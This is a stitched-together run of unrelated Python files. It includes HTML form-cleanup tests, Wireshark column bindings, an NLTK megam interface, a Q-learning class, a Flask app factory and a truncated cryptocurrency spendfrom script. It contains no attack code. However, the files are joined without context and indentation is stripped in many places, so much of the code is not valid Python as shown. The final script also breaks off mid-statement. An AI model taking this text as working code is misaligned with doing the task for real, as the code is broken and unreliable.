<option selected="" value="1">One</option>
<option value="2">Two</option>
<option value="3">Three</option>
</select>
</div>
""".strip()
assert expected == cleaned
def test_cleanup_and_scope_form_select_using_element_text():
original = """
<form>
<select name="foo">
<option>1</option>
<option selected>2</option>
<option>3</option>
</select>
</form>
"""
cleaned = cleanup_and_scope_form(original, "prefix.", dict(foo="1"))
expected = """
<div>
<select name="prefix.foo">
<option selected="">1</option>
<option>2</option>
<option>3</option>
</select>
</div>
""".strip()
assert expected == cleaned
def test_cleanup_and_scope_form_leave_hidden_alone():
original = """
<form>
<input type="hidden" name="foo" value="bar"/>
</form>
"""
cleaned = cleanup_and_scope_form(original, "prefix.", dict(foo="blah"))
# we should NOT set the value on a hidden
expected = """
<div>
<input name="prefix.foo" type="hidden" value="bar"/>
</div>
""".strip()
assert expected == cleaned
|
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Converts PNG files from the working directory into a HDF5 volume.
Usage:
./png_to_h5.py output_filename.h5
"""
import glob
import sys
import h5py
import numpy as np
from scipy import misc
assert len(sys.argv) >= 2
png_files = glob.glob('*.png')
png_files.sort()
images = [misc.imread(i) for i in png_files]
images = np.array(images)
with h5py.File(sys.argv[1], 'w') as f:
f.create_dataset('raw', data=images, compression='gzip')
|
'''Wireshark displays generic information about a packet's content in its GUI
using a set of columns. Each column has one of several pre-defined column-types
which ``libwireshark`` knows about and fills with content while dissecting a
packet. This allows dissectors of all kinds to provide information about a
packet, no matter where in the protocol this information is ultimately
retrieved from.
For example, :py:attr:`Type.PROTOCOL` provides the name of the deepest protocol
found within a frame; a raw ethernet frame may provide "eth" for PROTOCOL, an
IP packet within the ethernet frame overrules this to "ip", a TCP packet within
the IP packet again overrules to 'tcp' and an HTTP packet within the TCP packet
finally overrules to 'http'.
.. note::
    Wireshark uses columns in concert with its preferences, the API reading
    column-settings directly from the global preferences object. To make this
    concept more flexible, we avoid this binding.
'''
from .wireshark import iface, mod
from . import dfilter
from .cdata import (CDataObject, Attribute, BooleanAttribute, StringAttribute,
InstanceAttribute, IntListAttribute, StringListAttribute,
InstanceListAttribute)
class ColumnError(Exception):
'''Base class for all column-related errors.'''
pass
class InvalidColumnType(ColumnError):
'''An invalid column-type was provided.'''
pass
class Type(object):
'''A column-type.''' # TODO
_802IQ_VLAN_ID = mod.COL_8021Q_VLAN_ID #: 802.1Q vlan ID
ABS_DATE_TIME = mod.COL_ABS_DATE_TIME #: Absolute date and time
ABS_TIME = mod.COL_ABS_TIME #: Absolute time
CIRCUIT_ID = mod.COL_CIRCUIT_ID #: Circuit ID
DSTIDX = mod.COL_DSTIDX
#: !! DEPRECATED !! - Dst port idx - Cisco MDS-specific
SRCIDX = mod.COL_SRCIDX
#: !! DEPRECATED !! - Src port idx - Cisco MDS-specific
VSAN = mod.COL_VSAN #: VSAN - Cisco MDS-specific
CUMULATIVE_BYTES = mod.COL_CUMULATIVE_BYTES #: Cumulative number of bytes
CUSTOM = mod.COL_CUSTOM #: Custom column (any filter name's contents)
DCE_CALL = mod.COL_DCE_CALL
#: DCE/RPC connection orientated call id OR datagram sequence number
DCE_CTX = mod.COL_DCE_CTX
#: !! DEPRECATED !! - DCE/RPC connection oriented context id
DELTA_TIME = mod.COL_DELTA_TIME #: Delta time
DELTA_CONV_TIME = mod.COL_DELTA_CONV_TIME
#: Delta time to last frame in conversation
    RES_DST = mod.COL_RES_DST #: Resolved destination
    UNRES_DST = mod.COL_UNRES_DST #: Unresolved destination
    RES_DST_PORT = mod.COL_RES_DST_PORT #: Resolved destination port
UNRES_DST_PORT = mod.COL_UNRES_DST_PORT #: Unresolved destination port
DEF_DST = mod.COL_DEF_DST #: Destination address
DEF_DST_PORT = mod.COL_DEF_DST_PORT #: Destination port
EXPERT = mod.COL_EXPERT #: Expert info
IF_DIR = mod.COL_IF_DIR #: FW-1 monitor interface/direction
OXID = mod.COL_OXID #: !! DEPRECATED !! - Fibre Channel OXID
RXID = mod.COL_RXID #: !! DEPRECATED !! - Fibre Channel RXID
FR_DLCI = mod.COL_FR_DLCI #: !! DEPRECATED !! - Frame Relay DLCI
FREQ_CHAN = mod.COL_FREQ_CHAN #: IEEE 802.11 (and WiMax?) - Channel
BSSGP_TLLI = mod.COL_BSSGP_TLLI #: !! DEPRECATED !! - GPRS BSSGP IE TLLI
HPUX_DEVID = mod.COL_HPUX_DEVID
#: !! DEPRECATED !! - HP-UX Nettl Device ID
HPUX_SUBSYS = mod.COL_HPUX_SUBSYS
#: !! DEPRECATED !! - HP-UX Nettl Subsystem
DEF_DL_DST = mod.COL_DEF_DL_DST #: Data link layer destination address
DEF_DL_SRC = mod.COL_DEF_DL_SRC #: Data link layer source address
    RES_DL_DST = mod.COL_RES_DL_DST #: Resolved DL destination
UNRES_DL_DST = mod.COL_UNRES_DL_DST #: Unresolved DL destination
RES_DL_SRC = mod.COL_RES_DL_SRC #: Resolved DL source
UNRES_DL_SRC = mod.COL_UNRES_DL_SRC #: Unresolved DL source
RSSI = mod.COL_RSSI #: IEEE 802.11 - received signal strength
TX_RATE = mod.COL_TX_RATE #: IEEE 802.11 - TX rate in Mbps
DSCP_VALUE = mod.COL_DSCP_VALUE #: IP DSCP Value
INFO = mod.COL_INFO #: Description
COS_VALUE = mod.COL_COS_VALUE #: !! DEPRECATED !! - L2 COS Value
RES_NET_DST = mod.COL_RES_NET_DST #: Resolved net destination
UNRES_NET_DST = mod.COL_UNRES_NET_DST #: Unresolved net destination
RES_NET_SRC = mod.COL_RES_NET_SRC #: Resolved net source
UNRES_NET_SRC = mod.COL_UNRES_NET_SRC #: Unresolved net source
DEF_NET_DST = mod.COL_DEF_NET_DST #: Network layer destination address
DEF_NET_SRC = mod.COL_DEF_NET_SRC #: Network layer source address
NUMBER = mod.COL_NUMBER #: Packet list item number
PACKET_LENGTH = mod.COL_PACKET_LENGTH #: Packet length in bytes
PROTOCOL = mod.COL_PROTOCOL #: Protocol
REL_TIME = mod.COL_REL_TIME #: Relative time
    REL_CONV_TIME = mod.COL_REL_CONV_TIME
    #: Relative time to last frame in conversation
DEF_SRC = mod.COL_DEF_SRC #: Source address
DEF_SRC_PORT = mod.COL_DEF_SRC_PORT #: Source port
RES_SRC = mod.COL_RES_SRC #: Resolved source
UNRES_SRC = mod.COL_UNRES_SRC #: Unresolved source
RES_SRC_PORT = mod.COL_RES_SRC_PORT #: Resolved source port
UNRES_SRC_PORT = mod.COL_UNRES_SRC_PORT #: Unresolved source Port
TEI = mod.COL_TEI #: Q.921 TEI
UTC_DATE_TIME = mod.COL_UTC_DATE_TIME #: UTC date and time
UTC_TIME = mod.COL_UTC_TIME #: UTC time
CLS_TIME = mod.COL_CLS_TIME
#: Command line specific time (default relative)
NUM_COL_FMTS = mod.NUM_COL_FMTS
MAX_INFO_LEN = mod.COL_MAX_INFO_LEN
MAX_LEN = mod.COL_MAX_LEN
def __init__(self, fmt):
'''Get a reference to specific column-type.
:param fmt:
One of the defined column-types, e.g. :py:attr:`Number`
'''
if fmt not in range(self.NUM_COL_FMTS):
raise InvalidColumnType(fmt)
self.fmt = fmt
def __repr__(self):
r = '<Type description="%s" format="%s">' % (self.format_desc,
self.format_string)
return r
def __int__(self):
return self.fmt
def __eq__(self, other):
return int(other) == int(self)
def __hash__(self):
return hash(self.fmt)
@classmethod
def from_string(cls, format_string):
fmt = mod.get_column_format_from_str(format_string.encode())
if fmt == -1:
raise InvalidColumnType(format_string)
return cls(fmt)
@classmethod
def iter_column_formats(cls):
'''Iterate over all available column formats.
:returns:
An iterator that yields instances of :py:class:`Type`.
'''
for fmt in range(cls.NUM_COL_FMTS):
yield cls(fmt)
@property
def format_desc(self):
return iface.string(mod.col_format_desc(self.fmt))
@property
def format_string(self):
return iface.string(mod.col_format_to_string(self.fmt))
@property
def MAX_BUFFER_LEN(self):
if self.fmt == self.INFO:
return self.MAX_INFO_LEN
else:
return self.MAX_LEN
class Format(CDataObject):
'''A fmt_data'''
_struct = 'fmt_data'
title = StringAttribute(doc='Title of the column.')
type_ = InstanceAttribute(Type, structmember='fmt',
doc=('The column\'s type, one of '
':py:class:`Type`.'))
custom_field = StringAttribute(doc='Field-name for custom columns.')
    custom_occurrence = Attribute(doc=('Optional ordinal of occurrence '
'of the custom field.'))
    visible = BooleanAttribute(doc=('True if the column should be '
                                    'visible in the GUI.'))
resolved = BooleanAttribute(doc=('True to show a more human-'
'readable name.'))
def __init__(self, type_=None, init=None, title=None, custom_field=None,
custom_occurrence=None, visible=None, resolved=None):
'''
        :param init:
The underlying fmt_data-object to wrap or None to create a new one.
'''
self.cdata = init if init is not None else iface.new('fmt_data*')
if title is not None:
self.title = title
if type_ is not None:
self.type_ = type_
if custom_field is not None:
self.custom_field = custom_field
if custom_occurrence is not None:
self.custom_occurrence = custom_occurrence
if visible is not None:
self.visible = visible
if resolved is not None:
self.resolved = resolved
def __repr__(self):
return '<Format title="%s" type_="%s">' % (self.title, self.type_)
class ColumnInfo(CDataObject):
_struct = 'column_info'
num_cols = Attribute()
fmts = IntListAttribute('num_cols', 'col_fmt')
firsts = IntListAttribute(Type.NUM_COL_FMTS, 'col_first')
lasts = IntListAttribute(Type.NUM_COL_FMTS, 'col_last')
titles = StringListAttribute('num_cols', 'col_title')
custom_fields = StringListAttribute('num_cols', 'col_custom_field')
custom_occurrences = IntListAttribute('num_cols', 'col_custom_occurrence')
custom_field_ids = IntListAttribute('num_cols', 'col_custom_field_id')
custom_dfilters = InstanceListAttribute(dfilter.DisplayFilter,
sizeattr='num_cols',
structmember='col_custom_dfilter')
fences = IntListAttribute('num_cols', 'col_fence')
writeable = BooleanAttribute()
def __init__(self, init):
'''Create a new ColumnInfo-descriptor.
:param init:
Either a cdata-object to be wrapped or an iterable of
:py:class:`Format` instances.
'''
if isinstance(init, iface.CData):
self.cdata = init
else:
self.cdata = iface.new('column_info*')
self.num_cols = len(init)
self.firsts = [-1 for i in range(Type.NUM_COL_FMTS)]
self.lasts = [-1 for i in range(Type.NUM_COL_FMTS)]
self.fmts = [fmt.type_ for fmt in init]
self.titles = [fmt.title for fmt in init]
self.custom_fields = [fmt.custom_field if fmt.type_ == Type.CUSTOM
else None for fmt in init]
self.custom_occurrences = [fmt.custom_occurrence
if fmt.type_ == Type.CUSTOM else 0
for fmt in init]
self.custom_field_ids = [-1 for fmt in init]
self.custom_dfilters = [dfilter.DisplayFilter(fmt.custom_field)
if fmt.type_ == Type.CUSTOM else None
for fmt in init]
self.fences = [0 for fmt in init]
self._matx = []
for i in range(self.num_cols):
self._matx.append(iface.new('gboolean[]', Type.NUM_COL_FMTS))
self._matxp = iface.new('gboolean*[]', self._matx)
self.cdata.fmt_matx = self._matxp
for i in range(self.num_cols):
mod.get_column_format_matches(self.cdata.fmt_matx[i],
self.fmts[i])
self._col_data = [iface.NULL for fmt in init]
self._col_datap = iface.new('gchar*[]', self._col_data)
self.cdata.col_data = self._col_datap
self._col_buf = [iface.new('gchar[]', fmt.type_.MAX_BUFFER_LEN)
for fmt in init]
self._col_bufp = iface.new('gchar*[]', self._col_buf)
self.cdata.col_buf = self._col_bufp
self._col_expr = [iface.new('gchar[]', Type.MAX_LEN)
for fmt in init] + [iface.NULL]
self._col_exprp = iface.new('gchar*[]', self._col_expr)
self.cdata.col_expr.col_expr = self._col_exprp
self._col_expr_val = [iface.new('gchar[]', Type.MAX_LEN)
for fmt in init] + [iface.NULL]
self._col_expr_valp = iface.new('gchar*[]', self._col_expr_val)
self.cdata.col_expr.col_expr_val = self._col_expr_valp
for i in range(self.num_cols):
for j in range(Type.NUM_COL_FMTS):
if self._matxp[i][j]:
if self.firsts[j] == -1:
self.firsts[j] = i
self.lasts[j] = i
def __len__(self):
'''Equal to the number of columns in this descriptor'''
return self.num_cols
@property
def have_custom_cols(self):
''''''
# TODO do we really need this through the API ?
return bool(mod.have_custom_cols(self.cdata))
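# Minimal usage sketch (illustration only; requires the libwireshark bindings
# wrapped by `mod`/`iface` above to be loaded): build a three-column layout
# and wrap it in a ColumnInfo descriptor.
if __name__ == '__main__':
    fmts = [Format(type_=Type(Type.NUMBER), title='No.'),
            Format(type_=Type(Type.PROTOCOL), title='Protocol'),
            Format(type_=Type(Type.INFO), title='Info')]
    cinfo = ColumnInfo(fmts)
    print(len(cinfo), 'columns:', cinfo.titles)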
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2015-2015: Alignak team, see AUTHORS.txt file for contributors
#
# This file is part of Alignak.
#
# Alignak is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Alignak is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Alignak. If not, see <http://www.gnu.org/licenses/>.
#
#
# This file incorporates work covered by the following copyright and
# permission notice:
#
# Copyright (C) 2009-2014:
# Jean Gabes, [email protected]
# Hartmut Goebel, [email protected]
# Grégory Starck, [email protected]
# Zoran Zaric, [email protected]
# Sebastien Coavoux, [email protected]
# This file is part of Shinken.
#
# Shinken is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Shinken is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Shinken. If not, see <http://www.gnu.org/licenses/>.
#
# This file is used to test reading and processing of config files
#
from alignak_test import *
class TestConfig(AlignakTest):
def setUp(self):
self.setup_with_file('etc/alignak_resultmodulation.cfg')
def get_svc(self):
return self.sched.services.find_srv_by_name_and_hostname("test_host_0", "test_ok_0")
def get_host(self):
return self.sched.hosts.find_by_name("test_host_0")
def get_router(self):
return self.sched.hosts.find_by_name("test_router_0")
def test_service_resultmodulation(self):
svc = self.get_svc()
host = self.get_host()
router = self.get_router()
self.scheduler_loop(2, [[host, 0, 'UP | value1=1 value2=2'], [svc, 2, 'BAD | value1=0 value2=0'],])
self.assertEqual('UP', host.state)
self.assertEqual('HARD', host.state_type)
# This service got a result modulation. So Criticals are in fact
# Warnings. So even with some CRITICAL (2), it must be warning
self.assertEqual('WARNING', svc.state)
        # If we remove the resultmodulations, we should get the classic behavior
svc.resultmodulations = []
self.scheduler_loop(2, [[host, 0, 'UP | value1=1 value2=2'], [svc, 2, 'BAD | value1=0 value2=0']])
self.assertEqual('CRITICAL', svc.state)
        # Now look for the inherited thing:
        # resultmodulation is an implicitly inherited parameter,
        # and the router defines it, but test_router_0/test_ok_0 does not. So this service should also be impacted
svc2 = self.sched.services.find_srv_by_name_and_hostname("test_router_0", "test_ok_0")
self.assertEqual(router.resultmodulations, svc2.resultmodulations)
self.scheduler_loop(2, [[svc2, 2, 'BAD | value1=0 value2=0']])
self.assertEqual('WARNING', svc2.state)
if __name__ == '__main__':
unittest.main()
|
# Natural Language Toolkit: Interface to Megam Classifier
#
# Copyright (C) 2001-2010 NLTK Project
# Author: Edward Loper <[email protected]>
# URL: <http://www.nltk.org/>
# For license information, see LICENSE.TXT
#
# $Id: naivebayes.py 2063 2004-07-17 21:02:24Z edloper $
"""
A set of functions used to interface with the external U{megam
<http://www.cs.utah.edu/~hal/megam/>} maxent optimization package.
Before C{megam} can be used, you should tell NLTK where it can find
the C{megam} binary, using the L{config_megam()} function. Typical
usage:
>>> import nltk
>>> nltk.config_megam('.../path/to/megam')
>>> classifier = nltk.MaxentClassifier.train(corpus, 'megam')
"""
__docformat__ = 'epytext en'
import os
import os.path
import subprocess
from nltk.internals import find_binary
try:
import numpy
except ImportError:
numpy = None
######################################################################
#{ Configuration
######################################################################
_megam_bin = None
def config_megam(bin=None):
"""
Configure NLTK's interface to the C{megam} maxent optimization
package.
@param bin: The full path to the C{megam} binary. If not specified,
then nltk will search the system for a C{megam} binary; and if
one is not found, it will raise a C{LookupError} exception.
@type bin: C{string}
"""
global _megam_bin
_megam_bin = find_binary(
'megam', bin,
env_vars=['MEGAM', 'MEGAMHOME'],
binary_names=['megam.opt', 'megam', 'megam_686', 'megam_i686.opt'],
url='http://www.cs.utah.edu/~hal/megam/')
######################################################################
#{ Megam Interface Functions
######################################################################
def write_megam_file(train_toks, encoding, stream,
bernoulli=True, explicit=True):
"""
Generate an input file for C{megam} based on the given corpus of
classified tokens.
@type train_toks: C{list} of C{tuples} of (C{dict}, C{str})
@param train_toks: Training data, represented as a list of
pairs, the first member of which is a feature dictionary,
and the second of which is a classification label.
@type encoding: L{MaxentFeatureEncodingI}
@param encoding: A feature encoding, used to convert featuresets
into feature vectors.
@type stream: C{stream}
@param stream: The stream to which the megam input file should be
written.
@param bernoulli: If true, then use the 'bernoulli' format. I.e.,
all joint features have binary values, and are listed iff they
are true. Otherwise, list feature values explicitly. If
C{bernoulli=False}, then you must call C{megam} with the
C{-fvals} option.
@param explicit: If true, then use the 'explicit' format. I.e.,
list the features that would fire for any of the possible
labels, for each token. If C{explicit=True}, then you must
call C{megam} with the C{-explicit} option.
"""
# Look up the set of labels.
labels = encoding.labels()
labelnum = dict([(label, i) for (i, label) in enumerate(labels)])
# Write the file, which contains one line per instance.
for featureset, label in train_toks:
        # First, write the numeric index of the instance's label.
stream.write('%d' % labelnum[label])
# For implicit file formats, just list the features that fire
# for this instance's actual label.
if not explicit:
_write_megam_features(encoding.encode(featureset, label),
stream, bernoulli)
# For explicit formats, list the features that would fire for
# any of the possible labels.
else:
for l in labels:
stream.write(' #')
_write_megam_features(encoding.encode(featureset, l),
stream, bernoulli)
        # End of the instance.
stream.write('\n')
def parse_megam_weights(s, features_count, explicit=True):
"""
Given the stdout output generated by C{megam} when training a
model, return a C{numpy} array containing the corresponding weight
vector. This function does not currently handle bias features.
"""
if numpy is None:
raise ValueError('This function requires that numpy be installed')
assert explicit, 'non-explicit not supported yet'
lines = s.strip().split('\n')
weights = numpy.zeros(features_count, 'd')
for line in lines:
if line.strip():
fid, weight = line.split()
weights[int(fid)] = float(weight)
return weights
def _write_megam_features(vector, stream, bernoulli):
if not vector:
raise ValueError('MEGAM classifier requires the use of an '
'always-on feature.')
for (fid, fval) in vector:
if bernoulli:
if fval == 1:
stream.write(' %s' % fid)
elif fval != 0:
                raise ValueError('If bernoulli=True, then all '
                                 'features must be binary.')
else:
stream.write(' %s %s' % (fid, fval))
def call_megam(args):
"""
Call the C{megam} binary with the given arguments.
"""
if isinstance(args, basestring):
raise TypeError('args should be a list of strings')
if _megam_bin is None:
config_megam()
# Call megam via a subprocess
cmd = [_megam_bin] + args
    p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(stdout, stderr) = p.communicate()
# Check the return code.
if p.returncode != 0:
print
print stderr
raise OSError('megam command failed!')
return stdout
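# A minimal usage sketch (the binary path and the command-line arguments are
# illustrative assumptions; consult the megam documentation for real options):
#
# config_megam('/usr/local/bin/megam')
# out = call_megam(['-fvals', 'multiclass', 'train.megam'])
# weights = parse_megam_weights(out, features_count=1000)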
|
# -*- coding: utf-8 -*-
# Work around console encoding differences; safe to ignore.
import sys
import imp
imp.reload(sys)
try:
sys.setdefaultencoding('UTF8')
except Exception as E:
pass
import testValue
from popbill import ClosedownService, PopbillException
closedownService = ClosedownService(testValue.LinkID, testValue.SecretKey)
closedownService.IsTest = testValue.IsTest
closedownService.IPRestrictOnOff = testValue.IPRestrictOnOff
closedownService.UseStaticIP = testValue.UseStaticIP
closedownService.UseLocalTimeYN = testValue.UseLocalTimeYN
'''
Returns the URL for charging Popbill member points.
- For security reasons, the returned URL is valid for 30 seconds only.
- https://docs.popbill.com/closedown/python/api#GetChargeURL
'''
try:
print("=" * 15 + " 팝빌 연동회원 포인트 충전 팝업 URL 확인 " + "=" * 15)
# 팝빌회원 사업자번호
CorpNum = testValue.testCorpNum
# 팝빌회원 아이디
UserID = testValue.testUserID
url = closedownService.getChargeURL(CorpNum, UserID)
print("URL: %s" % url)
except PopbillException as PE:
print("Exception Occur : [%d] %s" % (PE.code, PE.message))
|
import numpy as np
import MDP
class RL:
def __init__(self,mdp,sampleReward):
'''Constructor for the RL class
Inputs:
mdp -- Markov decision process (T, R, discount)
sampleReward -- Function to sample rewards (e.g., bernoulli, Gaussian).
        This function takes one argument: the mean of the distribution and
returns a sample from the distribution.
'''
self.mdp = mdp
self.sampleReward = sampleReward
def sampleRewardAndNextState(self,state,action):
'''Procedure to sample a reward and the next state
reward ~ Pr(r)
nextState ~ Pr(s'|s,a)
Inputs:
state -- current state
action -- action to be executed
Outputs:
reward -- sampled reward
nextState -- sampled next state
'''
reward = self.sampleReward(self.mdp.R[action,state])
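        # Inverse-CDF sampling: draw u ~ U(0,1) and take the first state whose
        # cumulative transition probability reaches u.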
cumProb = np.cumsum(self.mdp.T[action,state,:])
nextState = np.where(cumProb >= np.random.rand(1))[0][0]
return [reward,nextState]
def qLearning(self,s0,initialQ,nEpisodes,nSteps,epsilon=0,temperature=0):
'''qLearning algorithm. Epsilon exploration and Boltzmann exploration
are combined in one procedure by sampling a random action with
        probability epsilon and performing Boltzmann exploration otherwise.
When epsilon and temperature are set to 0, there is no exploration.
Inputs:
s0 -- initial state
initialQ -- initial Q function (|A|x|S| array)
        nEpisodes -- # of episodes (one episode consists of a trajectory of nSteps that starts in s0)
nSteps -- # of steps per episode
epsilon -- probability with which an action is chosen at random
temperature -- parameter that regulates Boltzmann exploration
Outputs:
Q -- final Q function (|A|x|S| array)
policy -- final policy
'''
Q = initialQ
cumActProb = np.cumsum(np.ones(self.mdp.nActions)/self.mdp.nActions)
sFreq = np.zeros(self.mdp.nStates)
for episId in xrange(nEpisodes):
state = s0
for iterId in xrange(nSteps):
sFreq[state] += 1
alpha = 1/sFreq[state]
# choose action
if epsilon > np.random.rand(1):
action = np.where(cumActProb >= np.random.rand(1))[0][0]
else:
if temperature == 0:
action = Q[:,state].argmax(0)
else:
                        boltzmannVal = np.exp(Q[:,state]/temperature)
boltzmannProb = boltzmannVal / boltzmannVal.sum()
cumBoltzmannProb = np.cumsum(boltzmannProb)
action = np.where(cumBoltzmannProb >= np.random.rand(1))[0][0]
# sample reward and next state
[reward,nextState]=self.sampleRewardAndNextState(state,action)
# update Q value
Q[action,state] += alpha * (reward + self.mdp.discount * Q[:,nextState].max() - Q[action,state])
state = nextState
policy = Q.argmax(0)
return [Q,policy]
def modelBasedActiveRL(self,s0,defaultT,initialR,nEpisodes,nSteps,epsilon=0):
'''Model-based Active Reinforcement Learning with epsilon greedy
exploration
Inputs:
s0 -- initial state
        defaultT -- default transition function when a state-action pair has not been visited
initialR -- initial estimate of the reward function
        nEpisodes -- # of episodes (one episode consists of a trajectory of nSteps that starts in s0)
nSteps -- # of steps per episode
epsilon -- probability with which an action is chosen at random
Outputs:
V -- final value function
policy -- final policy
'''
cumActProb = np.cumsum(np.ones(self.mdp.nActions)/self.mdp.nActions)
freq = np.zeros([self.mdp.nActions,self.mdp.nStates,self.mdp.nStates])
T = defaultT
R = initialR
model = MDP.MDP(T,R,self.mdp.discount)
[policy,V,_] = model.policyIteration(np.zeros(model.nStates,int))
for episId in xrange(nEpisodes):
state = s0
for iterId in xrange(nSteps):
# choose action
if epsilon > np.random.rand(1):
action = np.where(cumActProb >= np.random.rand(1))[0][0]
else:
action = policy[state]
# sample reward and next state
[reward,nextState]=self.sampleRewardAndNextState(state,action)
# update counts
freq[action,state,nextState] += 1
asFreq = freq[action,state,:].sum()
# update transition
T[action,state,:] = freq[action,state,:]/asFreq
# update reward
R[action,state] = (reward + (asFreq-1)*R[action,state])/asFreq
# update policy
[policy,V,_] = model.policyIteration(policy)
state = nextState
return [V,policy]
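# A minimal usage sketch (illustrative; it assumes MDP.MDP(T, R, discount) as
# instantiated above and a reward sampler mapping a mean to a sample):
#
# import numpy as np
# T = np.ones([2, 3, 3]) / 3.0               # |A| x |S| x |S| transitions
# R = np.random.rand(2, 3)                   # |A| x |S| mean rewards
# rl = RL(MDP.MDP(T, R, 0.9), sampleReward=lambda mean: mean)
# [Q, policy] = rl.qLearning(s0=0, initialQ=np.zeros([2, 3]),
#                            nEpisodes=100, nSteps=50, epsilon=0.1)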
|
# -*- coding: utf-8 -*-
"""The app module, containing the app factory function."""
from flask import Flask
from remixvr.extensions import bcrypt, cache, db, migrate, jwt, cors
from remixvr import (commands, user, profile, project, theme, field,
space, activity, activitytype, classroom, school, submission)
from remixvr.settings import ProdConfig
from remixvr.exceptions import InvalidUsage
def create_app(config_object=ProdConfig):
"""An application factory, as explained here:
http://flask.pocoo.org/docs/patterns/appfactories/.
:param config_object: The configuration object to use.
"""
app = Flask(__name__.split('.')[0])
app.url_map.strict_slashes = False
app.config.from_object(config_object)
register_extensions(app)
register_blueprints(app)
register_errorhandlers(app)
register_shellcontext(app)
register_commands(app)
return app
def register_extensions(app):
"""Register Flask extensions."""
bcrypt.init_app(app)
cache.init_app(app)
db.init_app(app)
migrate.init_app(app, db)
jwt.init_app(app)
def register_blueprints(app):
"""Register Flask blueprints."""
origins = app.config.get('CORS_ORIGIN_WHITELIST', '*')
cors.init_app(user.views.blueprint, origins=origins)
cors.init_app(profile.views.blueprint, origins=origins)
cors.init_app(project.views.blueprint, origins=origins)
cors.init_app(theme.views.blueprint, origins=origins)
cors.init_app(field.views.blueprint, origins=origins)
cors.init_app(space.views.blueprint, origins=origins)
cors.init_app(activity.views.blueprint, origins=origins)
cors.init_app(activitytype.views.blueprint, origins=origins)
cors.init_app(classroom.views.blueprint, origins=origins)
cors.init_app(school.views.blueprint, origins=origins)
cors.init_app(submission.views.blueprint, origins=origins)
app.register_blueprint(user.views.blueprint)
app.register_blueprint(profile.views.blueprint)
app.register_blueprint(project.views.blueprint)
app.register_blueprint(theme.views.blueprint)
app.register_blueprint(field.views.blueprint)
app.register_blueprint(space.views.blueprint)
app.register_blueprint(activity.views.blueprint)
app.register_blueprint(activitytype.views.blueprint)
app.register_blueprint(classroom.views.blueprint)
app.register_blueprint(school.views.blueprint)
app.register_blueprint(submission.views.blueprint)
def register_errorhandlers(app):
def errorhandler(error):
response = error.to_json()
response.status_code = error.status_code
return response
app.errorhandler(InvalidUsage)(errorhandler)
def register_shellcontext(app):
"""Register shell context objects."""
def shell_context():
"""Shell context objects."""
return {
'db': db,
'User': user.models.User,
'UserProfile': profile.models.UserProfile,
'Project': project.models.Project,
'Theme': theme.models.Theme,
'Field': field.models.Field,
'Position': field.models.Position,
'Text': field.models.Text,
'Number': field.models.Number,
'Audio': field.models.Audio,
'Video': field.models.Video,
'VideoSphere': field.models.VideoSphere,
'Image': field.models.Image,
'PhotoSphere': field.models.PhotoSphere,
'Space': space.models.Space,
'Activity': activity.models.Activity,
'ActivityType': activitytype.models.ActivityType,
'Classroom': classroom.models.Classroom,
'School': school.models.School,
'Submission': submission.models.Submission
}
app.shell_context_processor(shell_context)
def register_commands(app):
"""Register Click commands."""
app.cli.add_command(commands.test)
app.cli.add_command(commands.lint)
app.cli.add_command(commands.clean)
app.cli.add_command(commands.urls)
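# A minimal usage sketch (illustrative; DevConfig is assumed to exist in
# remixvr.settings alongside ProdConfig):
#
# from remixvr.settings import DevConfig
# app = create_app(DevConfig)
# app.run(debug=True)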
|
#!/usr/bin/env python
#
# Use the raw transactions API to spend ones received on particular addresses,
# and send any change back to that same address.
#
# Example usage:
# spendfrom.py # Lists available funds
# spendfrom.py --from=ADDRESS --to=ADDRESS --amount=11.00
#
# Assumes it will talk to a oned or One-Qt running
# on localhost.
#
# Depends on jsonrpc
#
from decimal import *
import getpass
import math
import os
import os.path
import platform
import sys
import time
from jsonrpc import ServiceProxy, json
BASE_FEE=Decimal("0.001")
def check_json_precision():
"""Make sure json library being used does not lose precision converting BTC values"""
n = Decimal("20000000.00000003")
satoshis = int(json.loads(json.dumps(float(n)))*1.0e8)
if satoshis != 2000000000000003:
raise RuntimeError("JSON encode/decode loses precision")
def determine_db_dir():
"""Return the default location of the One Core data directory"""
if platform.system() == "Darwin":
return os.path.expanduser("~/Library/Application Support/OneCore/")
elif platform.system() == "Windows":
return os.path.join(os.environ['APPDATA'], "OneCore")
return os.path.expanduser("~/.onecore")
def read_bitcoin_config(dbdir):
"""Read the one.conf file from dbdir, returns dictionary of settings"""
from ConfigParser import SafeConfigParser
class FakeSecHead(object):
def __init__(self, fp):
self.fp = fp
self.sechead = '[all]\n'
def readline(self):
if self.sechead:
try: return self.sechead
finally: self.sechead = None
else:
s = self.fp.readline()
if s.find('#') != -1:
s = s[0:s.find('#')].strip() +"\n"
return s
config_parser = SafeConfigParser()
config_parser.readfp(FakeSecHead(open(os.path.join(dbdir, "one.conf"))))
return dict(config_parser.items("all"))
def connect_JSON(config):
"""Connect to a One Core JSON-RPC server"""
testnet = config.get('testnet', '0')
testnet = (int(testnet) > 0) # 0/1 in config file, convert to True/False
if not 'rpcport' in config:
config['rpcport'] = 19998 if testnet else 9876
connect = "http://%s:%[email protected]:%s"%(config['rpcuser'], config['rpcpassword'], config['rpcport'])
try:
result = ServiceProxy(connect)
# ServiceProxy is lazy-connect, so send an RPC command mostly to catch connection errors,
# but also make sure the oned we're talking to is/isn't testnet:
if result.getmininginfo()['testnet'] != testnet:
